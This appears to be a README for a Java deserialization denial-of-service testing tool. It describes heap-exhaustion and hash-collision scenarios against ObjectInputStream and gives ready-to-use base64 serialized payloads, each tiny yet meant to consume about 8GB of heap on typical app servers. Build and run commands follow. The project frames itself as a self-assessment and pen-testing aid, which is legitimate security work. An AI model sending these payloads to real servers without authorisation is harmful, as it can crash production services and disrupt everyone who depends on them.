Awesome

ObjectInputStream DoS

Project to safely test Java Serialization vulnerability using DoS (OutOfMemoryError)

Provided as-is, only for self-assessment, agreed pen-testing purposes, etc.

Basic Scenarios

Generic Heap DoS inside ObjectInputStream
Heap DoS using nested Object[], ArrayList and HashMap
Collision attack on Hashtable
Collision attack on HashMap (Oracle Java 1.7)

Payloads for 8GB heap consumption

Should be enough to test the vulnerability in most app servers.

Generic (9 bytes):

rO0ABX1////3

Nested Object[] (44 bytes):

rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=

Nested ArrayList (67 bytes):

rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHB////3dwR////3cHBwcHBwcHBwcA==

Nested HashMap (110 bytes):

rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABBAAAAAc3EAfgAAP0AAAAAAAAx3CAAAABBAAAAAcHB4cHg=

Payloads for collision attacks

Hashtable: see hashtable.collisions.txt file (1.2M), using 10k entries for collision, deserialization takes 40s
HashMap: (1.7 only) see hashmap.collisions.txt file (800k), using 10k entries for collision, deserialization takes 50s

Build & Run

mvn clean package

java -Xmx25g -jar target/oisdos-1.0.jar

E.g:

java -Xmx25g -jar target/oisdos-1.0.jar Generic

java -Xmx25g -jar target/oisdos-1.0.jar ArrayListHeap

java -Xmx25g -jar target/oisdos-1.0.jar HashtableCollisions 5000

Other info

Licence: MIT
Already reported to Oracle (in 2015) with "won't fix" response